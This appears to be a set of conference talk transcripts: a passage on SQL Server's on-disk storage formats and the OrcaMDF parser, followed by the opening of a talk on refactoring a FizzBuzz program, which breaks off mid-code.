data. So your record is going to be pushed off somewhere else. So when the disk needs to read your data, it's going to go like this, just trying to find your data all over the hard drive. So it can be very difficult to predict what kind of performance you're going to get, because you'll basically get fragmented reads, because some of your data is pushed off row. Those were the SLOBs, the small large objects. Now I'll show you the large objects: varchar(max). These are the new kinds of large objects. So I just need to disconnect this guy and connect this guy. Just do like this. So I'll create an empty database. We've got a table. I've got a char filler column just to put in some dummy data. We're not going to use it; it's just to take up some space. And a varchar(max). Then I'll just insert the values a, b, c, d. Look at page 148. And what we'll see at the end is that SQL Server tells us through DBCC PAGE that this is stored as blob inline data. And that's not actually a structure -- it's just the data stored inline -- it just describes it as a structure. If we instead insert 5,000 characters and look at the page, what we'll see is a blob inline root, because we've already got 5,000 characters of data through the char column, so it has to row overflow it. And this is the exact same thing as we saw just before: it simply inserts a blob inline root pointer that points to a different page. And if we insert 16 kilobytes of data and look at the page, what we'll see is, again, a blob inline root. Now we just have two pointers.
So that blob inline root can actually have multiple pointers that just tell us: first you get the first part of the data here, and then you get the next part here. And we just follow all of these pointers. If we instead try and insert 48 kilobytes and look at the page, what we will see is, once again, a blob inline root. But now there's only one pointer, even though we inserted more data. That doesn't really make sense. So let's try and look at page 148, which it points to. If we look at that guy, what we will find is another structure, in this case known as an internal. And that one has a number of pointers. So now we have a blob inline root pointer that points to another structure known as an internal, which then points to where you're going to find your data. So we need to follow this whole structure. So blob inline data: once it fits on the page, that is the structure we're going to use -- just the data in row, completely normal. When it doesn't fit in row, we're going to overflow it and insert a blob inline root pointer. And once it overflows, we're going to use some different records to actually store the data. I showed you the blob fragment record before. And what I'm going to show you now is a series of different blob structures where it actually stores this data. And all of these are stored in completely normal records. I've got a couple of status bytes and the fixed length pointer. So when you look at these next structures, just remember that we've got four extra bytes, which is the overhead in the record. But we're not going to look at those now. So one of the structures we're going to see is a type 3, a data structure. And this is where your data is actually stored. So once it overflows, it'll put that in the data record, and you can find your data. And the data record has got an 8 byte blob ID, also known as the timestamp, and a 2 byte type indicator that tells us what kind of structure we're looking at, which for data is 3. And if you look at data: we've got 8,096 bytes in the body. We need 2 bytes for the slot pointer, so we've got 8,094 bytes. And we've got 10 bytes of overhead here, and we've got 4 bytes of overhead in the record itself. So we're down to 8,080 bytes left on the page. But the most SQL Server will actually store is 8,040. And the reason for that is that SQL Server may need to add this 14 byte versioning structure, and it may need to add other stuff while rebuilding indexes and doing other maintenance operations. So just to ensure that it has space, it won't fill out the page completely. So the internal has a couple of fields as well. It is type 2 -- the same sort of structure as we saw before. It stores how many pointers it has right now; this one has 19. It stores a MaxLinks field, which is weird, because it says 501, but it won't store more than 500. So I have no idea what it's used for. Doesn't really make sense. If we look at it, it's got a blob ID timestamp, just like the data lob structure. It's got a 2 byte type indicator that tells us this is an internal. It's got the MaxLinks, CurrentLinks, and level. So if you have multiple of these pointing to each other, a tree is going to be built. And it's going to say this is level 1, this is level 2, and so forth. And finally, it's got an array of pointers that tell us where you're going to find the actual data. So to sum up, if the data fits in the record, it will just store blob inline data in the record.
If you've got less than 40 kilobytes, it will store a blob inline root that points to different data lob structures. More than 40 kilobytes, it's going to store a blob inline root that points to an internal that points to a series of these data lob structures. More than that, up to four megs of data -- well, more than four megs of data -- you'll have a blob inline root that points to multiple internals that point to a lot of these data lob structures. More than 16 megabytes, you'll have a blob inline root that points to an internal, that points to another internal, that points to data. And can anyone guess what happens then? We don't need any more, because if we have just four pointers in that blob inline root that point to 500 internals, which in turn point to 500 other internals, we can store up to 7.5 gigabytes of data. And given that the max size is two gigs, we have plenty at this point. So we don't need any more levels than that. However, you might see some different variations of this, but as long as you know how to parse these individual pointers, you don't really care whether you're following, like, 17 different pointers. You will find your data eventually. Those are the max types. Does anyone want me to repeat it just quickly? No? Any questions? Excellent. I see brains melting. So let's look at the classic lob types. Those were the new ones -- the smartly designed ones. Let's look at the old ones. Has anyone worked with Sybase, perhaps? I think there are remnants of it in here. So the classic lob types don't store any data in row, ever. They always push it off row. And you can actually make the new types do the same by setting a table option called large value types out of row. If you do that, the new lob types will actually act completely like the old types. So don't do it unless you have a really good reason. What it does is leave behind a complex column pointer, just as before. But this time, it's known as a text pointer. A text pointer has an 8-byte timestamp. It's got a page ID, file ID, and slot ID. So pretty much like the blob inline root, just only 16 bytes and a bit more to the point. This is the page pointer. If we look at that: if we store less than or equal to 64 bytes of data, it will point to a structure known as a small root. And the interesting thing is, no matter how much data you store, as long as it's less than 65 bytes, it's going to use 84 bytes on disk. So the small root can store up to 64 bytes of data. If you only store 24 bytes, you've got 40 bytes of garbage on disk. And that took me some time to figure out as well, because I was looking at the structure, I had way too much data, couldn't make sense of it. I thought it was important. But it's just garbage. So no matter what, 84 bytes. If it doesn't fit in those 64 bytes, it's going to insert what's known as a large root Yukon structure, which is kind of like a blob inline root or an internal structure that just points to other places. It's got a header, and then it's got an array of these pointers. And the large root Yukon structure type -- just like data and internal have types -- is type 5. This one won't be less than 84 bytes either. So once again, if you've got a header that takes up 20 bytes and you've got a single pointer that takes up 12 bytes, you're up to 32 bytes; if that is all you need, it's still going to take up 84 bytes no matter what. So that's just a lot of garbage data. And this is a general pattern with those old types. There's a lot of garbage in there that just doesn't make sense.
So for the classic lob types: less than 65 bytes of data, it will be stored in the small root. Less than 40 kilobytes of data, you'll point to a large root Yukon that then points to the data lobs. More than 40 kilobytes, we will have a text pointer pointing to a large root Yukon that then points to an internal -- the exact same internal we saw just before -- that then points to data lobs. And if you have more than that, you'll have a text pointer pointing to a large root Yukon, pointing to an internal, pointing to an internal, pointing to data lobs. And that is all we need, because once again, we have those -- in this case -- three levels. We just have this large root Yukon for whatever reason, but we have all the space we need. So an interesting thing to observe is that if we store null in either text, which is a classic lob type, varchar(max), the new one, or varchar(x), all of those are going to store zero bytes, because it's null. If we store 0 to 64 bytes of data -- let's just say this is zero bytes of data, or storing an empty string -- varchar(x) is going to store zero bytes on disk. Varchar(max) is going to store zero bytes on disk. The text type is going to store a 16 byte text pointer pointing to an 84 byte structure that doesn't contain any data. So you're wasting 100 bytes to store an empty string with the text type. Do not use these classic types if you can avoid it. If you're storing 65 to 8,000 bytes of data, varchar(x) will usually store just that data. Varchar(max) might have a 24 byte blob inline root pointer, and it might have 14 bytes of overhead for the record it's pointing to. The text type will store a 16 byte text pointer pointing to an 84 byte large root Yukon pointing to another page -- another record with 14 bytes of overhead -- and then you have the data. So obviously, there's a lot of overhead in this type. Once you store more than 8 kilobytes, we can't do it in varchar(x). Varchar(max) will generally store whatever is needed for the tree and the data, plus the 24 byte blob inline root pointer. The text type will store pretty much the same tree, using internals, using data lobs, but it'll have the 16 byte text pointer and the large root Yukon. So the more data you're storing, the smaller the difference actually is. But generally, there's no case where the classic lob types win over the new ones, so you don't want to use them. There's also some difference on the performance side. I've got a one hour session on that, if anyone is bored tonight. Otherwise, there's a blog post by another clever guy who's done a lot of testing on this. Generally, don't use them. So one interesting thing: I've mentioned some different structures here. I've mentioned small root, internal, data, large root Yukon, and if you look at the types of those, small root is zero, internal is two, data is three. I kind of wondered what type one is, because there's a gap in there. What is type four, and are there any more types? And if we look at these different lob structures, generally you've got some kind of header. But more interestingly, you've got a two byte value that says what kind of structure this is. So I shut down SQL Server again, opened up the file in the hex editor, and changed those two bytes. I didn't change anything else, just those two bytes. And I changed that type to a one, and a four, and a six. And it came up with some different names. Obviously, I corrupted the database each time, but DBCC PAGE was kind enough to give me the names of these structures. We've got a large root.
We've got a large root Shiloh; Shiloh was the code name for SQL Server 2000. We've got a super large root, and I have no idea what that is; I've never seen it in the wild. What I'm thinking is that at some point, pre-SQL Server 2000, they probably had this plain large root structure. Then in SQL Server 2000 they needed to change something, so they added the large root Shiloh. In 2005, code name Yukon, they needed to change it again, so they added the large root Yukon. And the super large root is probably pre-SQL Server 2000: SQL Server 7, maybe even Sybase; I have no idea how old it is. Once I got up to 8, it began giving me null and invalid. 7, interestingly, was neither null nor invalid, but it had an empty name; I'm not sure what it is or whether it's used. You won't see these types in SQL Server 2005 and 2008 onwards, but they are probably out there. So just to sum it up: if you have less than 8,000 characters, the MAX types are pretty much the same as the regular varchar(n) types. Logically they're stored slightly differently, but on disk it's the same. More than 8,000, you start building a whole tree. And if you're using the classic text types, there's a lot of legacy cruft in there, a lot of overhead, so don't use them. Any questions before I speed up, since I'm running short on time? Good. So SQL Server stores stuff either as a clustered index or a heap; clustered indexes and heaps are where data is actually stored. The primary difference is that a clustered index guarantees the order of your data and is stored in a B-tree, whereas a heap just puts your data in wherever there's space, with no tree structure. SQL Server also keeps track of this logically in what's known as allocation units. So if you have an object, either a heap, a clustered index or a non-clustered index, each of those will have a number of partitions, at least one, maybe more. And each of those partitions will have allocation units. There's the heap-or-B-tree allocation unit, also known as the HoBT allocation unit, and this is your in-row data; this is where your rows are actually stored. If you have row overflow, it will be stored in the SLOB (row-overflow) allocation unit. And if you have the classic text types, they'll be stored in the LOB allocation unit, just as varchar(MAX) data is also stored in the LOB allocation unit. If we have a B-tree, we've got a root page somewhere; we just need to follow it all the way down to the very first leaf-level page, and since the leaf pages are stored in a doubly linked list, we can just follow that linked list of pages and read all the data. A heap is different, because it's not stored in a tree; it uses what's known as an IAM page, a tracking page that keeps track of "these pages are mine, this is where my data is". So we can find that first IAM page and follow its links to the pages, and eventually a link to the next IAM page that has links to more pages, and that way we can find all the data. So generally, we either need to find that root page or that first IAM page; a small sketch of the two scan approaches follows below. Now, data is not just tracked page by page. Pages are grouped into what's known as an extent, which is a group of eight pages, 64 kilobytes of data. And they come in two flavors. You've got the mixed extent, where different objects, different tables, different indexes, store pages within the same logical group of eight, and the first eight pages of any object will be stored on mixed extents, just to save space.
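As a rough illustration of the B-tree scan just described, here is a hedged C# sketch of following the doubly linked leaf level. The Page type and the read-page delegate are hypothetical placeholders I've invented for the example; they are not OrcaMDF's actual API.

    using System;
    using System.Collections.Generic;

    // Hypothetical minimal page abstraction: just the next-page pointer from the page header.
    class Page
    {
        public short NextFileId;
        public int NextPageId;   // 0 means end of the linked list
    }

    class LinkedPageScanner
    {
        private readonly Func<short, int, Page> _readPage;  // loads a page by (fileId, pageId)

        public LinkedPageScanner(Func<short, int, Page> readPage) { _readPage = readPage; }

        // Walks the doubly linked list of leaf pages, starting from the first leaf page.
        public IEnumerable<Page> ScanLeafLevel(Page firstLeafPage)
        {
            var current = firstLeafPage;
            while (current != null)
            {
                yield return current;  // caller reads the records on this page
                current = current.NextPageId == 0
                    ? null
                    : _readPage(current.NextFileId, current.NextPageId);
            }
        }
    }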
From that point on, once the object needs more pages, it'll allocate eight new pages at a time: a complete, uniformly dedicated extent for that object. And the way it keeps track of this is through some allocation pages. We've got the global allocation map, the GAM, which keeps track overall: is this extent of eight pages allocated or not, is it in use or not? We've got the SGAM, the shared global allocation map, which keeps track of whether this is a mixed extent, with different objects in it, and whether there's free space available. Each of these pages has those 8,192 bytes to work with, so it can track 63,904 extents. 63,904 times 64 kilobytes is just about four gigabytes. After that, we've got a new GAM page, a new SGAM page, and a new GAM interval; so the data file is split up into these four-gigabyte intervals that we need to track. We've also got the IAM page, which keeps track of which extents are uniformly allocated to a single allocation unit. So if we have a heap and it has an extent with data in it, that IAM page will record that these eight pages, this extent, is owned by this object uniformly. The IAM page has a header that I'm not going to go into; more importantly, there's an array of single-page pointers. Since the first eight pages for a given object are allocated from mixed extents, shared with different objects, we need single-page pointers for those; after that, we just need a bitmap of the extents where the data is stored. If we put this up in a table: the GAM bit overall just tracks whether this extent is in use or not. If it's one, it means it's not in use; basically, one says it's available. The SGAM bit will be one if the extent is mixed and there's free space; if it's mixed but there's no free space, it will be zero. And finally, the IAM bit says: is this extent uniformly dedicated to this allocation unit? If we combine all of these, we get the different states an extent can be in, plus a series of invalid states that don't make sense; it can't be uniformly allocated while it's not in use. Using this table, we can find out, for a specific extent, what's stored in it and what its state is. There's also another allocation page type called a PFS page, page free space, which doesn't store a bitmap tracking extents but a byte map tracking pages. Every page within its range of 8,088 pages gets a single byte that keeps track of how much free space there is, whether there are ghost records that need to be physically deleted from disk, whether it's an IAM page, a mixed page, an allocated page, and so forth. PFS pages aren't that interesting in this case; it's the other allocation pages that we really need in order to find the data. So, quickly, an MDF file: the very first page is the file header. That's the first thing OrcaMDF parses, to find out whether this is your primary data file or a secondary data file, and where it fits into the sequence of data files. We've got the first PFS page, GAM page and SGAM page. We've got some legacy pages that are unused. We've got a differential map page that tracks which extents have been modified since the last differential backup; as you all know, those are the ones we need to back up. We've got an ML map page that keeps track of which extents have been modified by a minimally logged operation since the last backup, once again used for backup purposes. And then at some point it just repeats itself with a new PFS page, new GAM page, new SGAM page. More interestingly, page 9 is the boot page.
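To make the GAM/SGAM bit table just described concrete, here is a small C# sketch that turns a bit pair into the extent state from the talk (GAM = 1 meaning the extent is free, SGAM = 1 meaning it is a mixed extent with free pages). This is just an illustration of the table, not code from OrcaMDF.

    static string DescribeExtent(bool gamBit, bool sgamBit)
    {
        if (gamBit && !sgamBit)  return "Free, not in use";
        if (!gamBit && !sgamBit) return "Uniform extent, or mixed extent with no free pages";
        if (!gamBit && sgamBit)  return "Mixed extent with free pages";
        return "Invalid: an unallocated extent cannot be a mixed extent with free pages";
    }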
And I'll show you the boot page in just a moment. Now comes the fun stuff, or the funnier stuff. We know how to parse a page, but we need to find it. We need the schema to parse it, we need to know what we expect to find, and more importantly, we need a pointer to that very first page so we know where to begin scanning. So let's see how we could do it. I'll create an empty database, and I'll create a table; it doesn't really matter what the structure is, we just need a table. I'll insert a single record. If we now look up this table in the sys.tables and sys.columns views, we get its whole structure: the names of the columns, the IDs, the types, which we can look up and find that these are ints and varchars, whatever they are. Using this, we've got the schema. If we run DBCC IND, we get the page ID, which is what we need. So we need a way to replicate what DBCC IND does. If we look up our table in the sys.tables view, we get an object ID. If we take that object ID and look it up in sys.partitions, we get a partition ID. If we then take that partition ID and look it up in sys.system_internals_allocation_units, we get an allocation unit ID and, more importantly, a pointer to that very first page. Using this, we've now got a pointer to the page, we know how to parse it, we're done. Almost. So sys.tables gives us the object ID, sys.partitions gives us the partition ID, and sys.system_internals_allocation_units gives us the allocation unit ID and the pointer to the very first page. The problem is that these are system views and dynamic management views, and they're not stored on disk as such. We need to look things up in them to find the pages we need to read, but we can't query them unless SQL Server is running, and that kind of defeats the purpose. So there's a problem here. But there's always a but. We've got an empty database, and if we use sp_helptext on the sys.tables view, it will actually give us the source code of it. If we look at this, what we see is that sys.tables at some point does a select from sys.objects$. So sys.objects$ looks interesting. We can do the same for sys.columns, and we will see it looks up in sys.syscolpars. So we've got some more, kind of more internal tables here. Let's try a select star from sys.objects$. Doesn't exist. SQL Server hides all of this from you, because you're not supposed to look at it. But there's a special way you can connect to SQL Server: if you connect again with an "admin:" prefix, and you've enabled what's known as the dedicated administrator connection, you get some special privileges. One of them is that it allows you to query the base tables. So now we're querying sys.objects$, and we're getting all of these table names, and a lot of them are the internal base tables that are not returned by sys.objects normally. We can also look up sys.syscolpars and so forth. So let's try to look up sys.objects$ in sys.objects$, since we need its object ID to move on. Problem is, there are no results: sys.objects$ doesn't exist there. If you look at the source code of sys.objects$, you'll find that it's actually a hidden view; it's not really an object. What it reads from is known as sys.sysschobjs. We can look up sys.sysschobjs in sys.objects$, and having done that, we can look up sys.sysschobjs in sys.sysschobjs itself. That gets us the very base table where this metadata is stored. So this is the lowest level you can get to that records that this object exists.
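Here is a hedged sketch of querying those hidden base tables over the dedicated administrator connection from C#. The "admin:" prefix and the sys.sysschobjs table come straight from the talk; the server name, database and column list are assumptions of mine, so adjust them for your environment, and remember that only one DAC connection is allowed at a time.

    using System;
    using System.Data.SqlClient;

    class DacProbe
    {
        static void Main()
        {
            // "admin:" forces the dedicated administrator connection (DAC).
            var connStr = "Data Source=admin:localhost;Initial Catalog=master;Integrated Security=true";
            using (var conn = new SqlConnection(connStr))
            using (var cmd = new SqlCommand("SELECT id, name FROM sys.sysschobjs", conn))
            {
                conn.Open();
                using (var reader = cmd.ExecuteReader())
                {
                    while (reader.Read())
                        Console.WriteLine("{0}\t{1}", reader.GetInt32(0), reader.GetString(1));
                }
            }
        }
    }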
So we've got an object ID of 34. Using sp_help, we can also get the schema of this table, which is fixed, at least for a given SQL Server version. So it's just a matter of running it once, hard-coding it, and we've got the schema for sys.sysschobjs. So we've found the base tables. They've got a lot of weird data, and I'm going to go really fast now. We can only query them through the dedicated administrator connection, and they've got a lot of weird columns that don't really match anything. But sys.sysschobjs is where we start. We've got an empty database, and we can look up sys.sysschobjs in sys.sysschobjs and get an object ID of 34. Using that, we can look up sys.syscolpars to get the columns of sys.sysschobjs. Using that same object ID, we can also look up sys.sysrowsets, which is the base table behind sys.partitions, and get the partition ID. And finally, we can look up sys.sysallocunits using that partition ID, and we have found that very first page. So everything is good. Now we have the base tables, but the problem is that we still need that very first pointer to the first base table. How do we find that one? If we do DBCC PAGE on page ID 9, which is the boot page, what we will find is that at some point there's an entry known as dbi_firstSysIndexes that points to page ID hex 10, which is page ID 16. If we look at that page, we're actually going to find the sys.sysallocunits base table. Since we've got a fixed location for the boot page, we can now consistently find sys.sysallocunits, and we can parse it. Question is, can we use that? This is the data we've got now. And if we hard-code a special allocation unit ID, 327,680, we will find a special allocation unit that is owned by the sys.sysrowsets object. Using that hard-coded allocation unit ID, we can now find the partition data. And using another hard-coded object ID of 34, we can find the allocation unit for the sys.sysschobjs table. So using just those two hard-coded values, we can now find sys.sysschobjs and move on from there. Once we've got sys.sysschobjs, we can look up sys.syscolpars in it, and we can look up the partitions, and we can look up the allocation units. And finally, we've got the data for sys.syscolpars, which gives us the schema. Now we've got the schema, we've got the objects, we've got the partitions, and we've got the allocation units. We've got everything. The one thing that remains is that when you look at the source code of these views, there are a lot of weird internal functions. In this case, and this is Microsoft's code, they're doing a select from sys.sysrscols, which is the base table, and then they're doing an outer apply on something known as OpenRowset(TABLE RSCPROP ...), and they pass the ti field of that table into it. And if you look, all of these output values stem from that very ti value. I googled this, and if you google it today, all you'll find is me whining in a blog post that there are no Google results about it. So I couldn't really find anything existing. What I did was create a table with a lot of different data types in different configurations. Then I did a select on the sys.system_internals_partition_columns view, joining that with the base table, sys.sysrscols, and joining it with the sys.types view that tells us about all the different data types. And I got a result like this, which tells me that for the binary type we've got a ti value of 12973, and these are all of the values that we need to extract out of that value.
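Before the hex walkthrough that follows, here is a minimal C# sketch of that extraction, using the binary(50) example just mentioned (ti = 12973 = 0x32AD). As the talk points out, different type families pack the ti value differently, so this simple masking only holds for types that store the max length directly after the type byte.

    using System;

    static class TiDecoder
    {
        static void Main()
        {
            DecodeTi(12973);   // prints "system type id = 173, max length = 50"
        }

        static void DecodeTi(int ti)
        {
            int systemTypeId = ti & 0xFF;           // low byte: 0xAD = 173 (binary)
            int maxLength    = (ti >> 8) & 0xFFFF;  // following bytes: 0x32 = 50
            Console.WriteLine("system type id = {0}, max length = {1}", systemTypeId, maxLength);
        }
    }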
If we look at binary and convert that ti value to hex, we've got two zero bytes and then 32 AD. If we look at the system type ID 173 and convert that to hex, we get AD, and AD seems to match the very last byte. So doing a simple bit mask, we can get that value out of the ti column: the system type ID. We also need the max length field, with a decimal value of 50, hex value 32, which is stored right next to it. So doing a simple mask and shift, we can extract that value from the ti field as well. All is good. Except each of these data types stores its information differently in the ti field, so you have to go through each of the data types and figure out how it stores its values. I have no idea why they didn't just store this in separate columns; that would have made my life so much easier. But I went through this for all of the different types, and what I ended up with was a parser. It's called the TI parser: it takes in a value and gives you back all of these different values for the different data types. I've got a boatload of unit tests for it, and it actually works. And with about five minutes to go, I think that was my mark. Did anyone not get anything of what I said? Simple stuff, right? Anyone have any questions? Once again: how long would it take to fully reverse engineer all the formats in SQL Server, based on what I've been able to do so far? I started out doing this for a conference in March last year. I just parsed a single page; I was doing an internal session and wanted something special. And I don't know what happened, but a year later I had this project, and right now it parses about 98% of the database format. I even parse compression, I parse sparse vectors and sparse columns, I've got a lot of special types handled. There's not really a lot more to do; I need some minor stuff here and there, and columnstore indexes add some new structures in SQL Server 2012 that I might add parsing for. There's some special stuff like XML fields, where I can parse the raw data out but I can't actually convert it into XML yet. So there are some data types I don't fully support, but I can get you the bytes stored on disk. So, well, a year is a long time, but it doesn't actually take that long. Once you get the page format down, you get the header, and you link it up, then all of a sudden you can scan a table. Once you get to that point, it's a very nice feeling. I spent about a year on it as a hobby next to my job. Thank you. Can you give me a scenario where I would want to use this? Where Microsoft would let me use it, or where I would like to use it? I recently had a database server that wouldn't start. I applied a Windows update, tried to start it, and it didn't work; I got a weird error in the event log. My first thought was that the master database might have been corrupted, so I opened the master database in OrcaMDF and verified that it was fine, and from that point on I could exclude that as the issue. I found the real issue later on; it was a permissions issue. That's a very simple case where I actually used it. Another thing: did anyone notice that I didn't type in a username or password for the AdventureWorks database? Unless you're using encryption, your data is open, completely open.
You can read any data from any database using this tool without logging in. If it's encrypted, I can't do it yet. But you might also use it if you have a database and you don't have logins for it. You might use it if you want to learn a lot about the internals just by looking at the source code. Technically, you could deploy this on your smartphone and read a SQL Server database with a 256-kilobyte DLL. I don't know why you'd want to do that, but you could. I don't really have many practical use cases; this is like playing football, it's just fun. What about contained databases? Yes, with contained databases the primary difference is that the users are stored in the actual database. I haven't looked at it yet, but they're probably just stored in some kind of metadata table on a page. I don't really care about the users, because I just read the data. If I wanted to parse the users, I would have to find that metadata table, and I've noted the passwords are encrypted, so I can't get those out. But I don't think there's a lot of difference in the actual format. The format is the same: same pages, same structures, everything. It's just more metadata tables. One more question: will the database structure change when we move from spinning disks to SSDs and put everything into a kind of memory? Yes and no. If you were to create SQL Server bottom-up today and optimize it for SSDs, sure, you'd definitely make some different choices. But SQL Server is heavily invested in the format it has right now. They most likely won't change it; I can't see them changing anything major anytime soon. The major difference is that a lot of the stuff you used to do, like defragmenting your tables, you don't really need to do anymore. It's still the same format, but you don't care about fragmentation. You care about filling your pages so you don't have a lot of free space on them, but you don't care about the sequence they're stored in, because SSDs are free to do random reads. So there's some stuff that doesn't matter anymore and that you might not want to optimize for, but I don't see the format changing right now. Unless there's anything else, I will be up here. Thank you for attending.
|
Think SQL Server is magical? You're right! However, there's some sense to the magic, and that's what I'll show you in this extremely deep dive session.
|
10.5446/50985 (DOI)
|
We good? Good afternoon everybody. My name is Philip Laureano, and today I will be talking about a different way of refactoring. The first thing I'm going to ask everybody here is: how many people have actually read the Refactoring book? Or have seen it, or heard of it? Okay, so quite a few of you. One of the things that I learned while writing all these different libraries is that when you're refactoring, at least when you're going through that book, one of the biggest problems is what Martin Fowler typically does: here's a list of smells, and if you see this particular smell, then you refactor it with this particular refactoring. While that's okay if you want a reference book, there really isn't any example that shows you how to do an end-to-end refactoring, so that you can start with a complete mess and go all the way to something that is relatively clean. At the same time, a book like the Refactoring book, although it is a great book, contains a lot of information, and there has to be some way to distill all of that into something you could take away and use immediately right after you leave this room. So here are a couple of examples of the bad code smells that they usually tell you to deal with in classical refactoring, and there are a lot of smells you actually have to look for. In this case, for the people in the audience as well as the people watching this on video, I have a GitHub account with the code for this talk. It's available right now if you want to check it out, along with the code I've written for my own libraries, because it's one thing for me to come up here and say I'm going to teach you how to refactor, but if you look at my code and it's not clean, then certainly there would be a lot of questions raised. So I challenge you to look at what I've written so far and tell me if you see anything wrong. Of course, there's always room for improvement, but to give you an idea, this is the kind of code that I write. So today I'm going to be talking about a different form of refactoring. It's nothing different from what you've read in the Refactoring book, but it's a little bit more focused. As you can see here, we have the different levels of refactoring: the single-line statements, the block statements, the methods, and the classes. Now, the problem with traditional refactoring is that there's nothing that links the chain so that you can go from the single-line level to the block level to methods to classes. So today I'm going to teach you something that's going to be a little bit different from what you might be used to. Some of you might even say it doesn't make any sense, because it's too robotic. What I'm going to introduce to you today is something called blind refactoring. I call it blind refactoring because I discovered it back in 2005, when I just kept refactoring my code base and didn't even realize that the quality of the code was getting better and better and better.
And the reason why I call it blind is because there was a certain set of steps that I kept following, and for some reason the designs I came up with afterwards were way better than anything I could have thought of if I had designed it up front. I'll give you an example. So let me back up a second. With blind refactoring, or with any typical refactoring operation, there are usually two things that you work with. In this case, you typically work with decomposition: that means you extract methods and you extract classes to the point where everything has one and only one responsibility. And, at least for those of you in the Java and .NET space, we have IoC containers which allow us to balance out this decomposition, so that even if you have all these little pieces scattered in a million places, we can still put them back together as if it was just the same app, without any of the duplication. So, everybody here is familiar with FizzBuzz, right? The basic principle is what you see here on the screen; I don't need to repeat it. But we're actually going to refactor FizzBuzz, which sounds a little bit silly. The reason why we're going to refactor FizzBuzz, despite its simplicity, is that the same principles that apply to refactoring FizzBuzz are the same principles you would apply to taking any component in your application and recursively refactoring it until it's absolutely clean. It doesn't matter whether it's an enterprise app or something you're coding at home; the principle is still the same, because it's just a repeatable set of steps that you follow. It's not like the typical Fowler approach, where you say, I need to look up this list of code smells and figure out what I need to do next. This is quite automatic. So with decomposing FizzBuzz, there are a few things we're going to be doing. Actually, the interesting thing about this particular approach is that there are only four types of refactoring that you need to deal with. The first and simplest one is method extraction. The second type is class extraction. The third one is that you have to be able to extract the interfaces out of your concrete classes, so that when you want to rely on interface dependencies rather than concrete dependencies, you can just go ahead and use the interfaces instead. And the fourth one, depending on how you want to do it, is probably the most important one: once you start extracting the interfaces, that's when you start replacing things like inheritance with delegation, so that when you make those calls you're no longer relying on inheritance, no longer relying on these large blocks of code. The other half of this is basically what I mentioned before: you have to extract all the interfaces, you have to replace all the concrete references, and optionally, for us .NET guys, there are some very, very good IoC containers out there that will actually put it all back together as if it was never a problem in the first place. And as I mentioned before, by the way, this is going to be the shortest set of slides you'll ever see in any presentation.
This is the last slide, actually. The interesting thing about this is that if you go to this URL right now, it actually has the complete history of one end-to-end refactoring, and I'll pull it up right now. What we have here is a standard FizzBuzz program. It's not very interesting, it doesn't do much, but the point is that we could pretend that this isn't FizzBuzz: we could pretend that this is some nasty 10,000-line program that somebody decided to put in one large main function, which does happen every now and then. So, thanks to the magic of Git, we can step forward and backward in time to see what this would actually look like from the very end all the way back to the very beginning. I'm not going to bore you with the steps in between, because it would be one thing for me to say that I know how to refactor without showing you what it actually looks like in the end. So let's step forward a bit and then we'll step backwards. Okay. What I have here is what FizzBuzz looks like after it has been completely refactored and completely broken down, to the point where you cannot refactor it anymore, at least in practical terms. One thing you might notice in this example is that FizzBuzz hasn't really changed all that much; there are only about four classes. By the way, has anybody here seen Enterprise FizzBuzz? Okay. If you want an example of how not to design something, take a look at Enterprise FizzBuzz. It was meant to be a joke, but if you want a contrast, check out Enterprise FizzBuzz and compare it to what you see here. As far as this example is concerned, what we have is very, very simple code. In fact, I haven't added anything to this at all. I've only moved a couple of things around, and the only thing I did add was an IoC container, because if you're working with a full-scale app, you need to be able to manage the dependencies without getting anything tangled up. In this case I'm using Hiro, but if you want to use Castle, StructureMap or Autofac, it's really up to you. None of these techniques are container-specific; this is pretty much container-neutral. All right. Now that you've seen what the end looks like, and it's quite simple, let's go all the way back to the beginning, back to the single program. I haven't touched anything. Now, I mentioned earlier that we have the different levels of refactoring: the single-statement level, the method level, the class level, and so on. At the very most basic level, what we want to do is eliminate the duplicate statements. We want to make sure that even in something this simple, there's absolutely no duplication. If you take a look at this, you'll see that there are multiple Console.WriteLine calls in place, and when you have a situation like this, where you have an if / else if chain calling the same statement, the simplest thing you can possibly do is extract out what it's writing. So if I go over here... okay, give me a second, I'm on a borrowed keyboard.
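For readers of the transcript, here is roughly the kind of single-method FizzBuzz the refactoring starts from. This is my reconstruction for illustration, not the exact code in the speaker's GitHub repository.

    using System;

    class Program
    {
        static void Main()
        {
            for (var i = 1; i <= 100; i++)
            {
                if (i % 15 == 0)
                    Console.WriteLine("FizzBuzz");
                else if (i % 3 == 0)
                    Console.WriteLine("Fizz");
                else if (i % 5 == 0)
                    Console.WriteLine("Buzz");
                else
                    Console.WriteLine(i);
            }
        }
    }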
Okay, here we go. In the words of Bill O'Reilly, we're going to do it live. While Visual Studio catches up with me, let's go over this; we can skip a few steps. Although we've skipped quite a few steps here, here's what happened: I did two things. I did a method extraction, and at the same time I changed the Console.WriteLine calls into a single WriteLine call and placed it here. And when I did the method extraction, all the logic that determines whether the number is Fizz, Buzz or FizzBuzz was placed into this one method. Not too interesting, right? But the point, at this stage, is that we're trying to recursively do method extractions until every single method you see is a single-task method. And when I say single-task method, I mean the method does one and only one thing. For example, if you have a method that looks up a config string and tries to connect to a database, it's doing two things, not one. In this case, we're still dealing with statics, and we're still dealing with these if / else if chains. Now, one thing about if and else if blocks: they might look clean when you only have three cases like this, but it gets messier and messier, because it's basically equivalent to a switch statement. ReSharper has a nice little tool that lets you invert an if, and I'll invert it in this case just so you get an idea of what it actually looks like. I'm going to completely invert the whole if statement to give you an idea of what kind of mess it really contains. Just by inverting these if statements, it pretty much reveals what you're actually dealing with. That wouldn't be bad given that this is only, what, 20 or 30 lines. But imagine if this was your 2,000-line program, or a 2,000-line class; those happen pretty often, depending on which client you end up with. So there has to be a way to clean this up, a way to take all that arrow code and flatten it. And it turns out there is. The way you flatten it is by inverting the if statements, and you keep inverting and introducing guard clauses until it effectively becomes a single-level if statement. I'll do this slowly, and luckily ReSharper can do most of the work, so it's not really that difficult. I have the if statement here, and I also have an else here. Let's invert it the first time around. Instead of assigning what to print, I'll just go ahead and do a return, and if you notice, ReSharper greys this part out and tells you that you no longer need it. That's pretty useful, because in most cases I'm actually using ReSharper to do my design for me. I can just take the else and remove it, and all of a sudden this is flat. If I do this again, say I go here, do a return, and invert again, the same thing happens. And with just a little touch-up, more semantic than anything, I can cut this down to just a little bit; the flattened result looks like the sketch below.
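Here is a sketch of that flattened result: each condition becomes a guard clause with an early return, so only one level of nesting is left. The method name is my own choice for illustration.

    static string GetTextToPrint(int number)
    {
        if (number % 15 == 0)
            return "FizzBuzz";
        if (number % 3 == 0)
            return "Fizz";
        if (number % 5 == 0)
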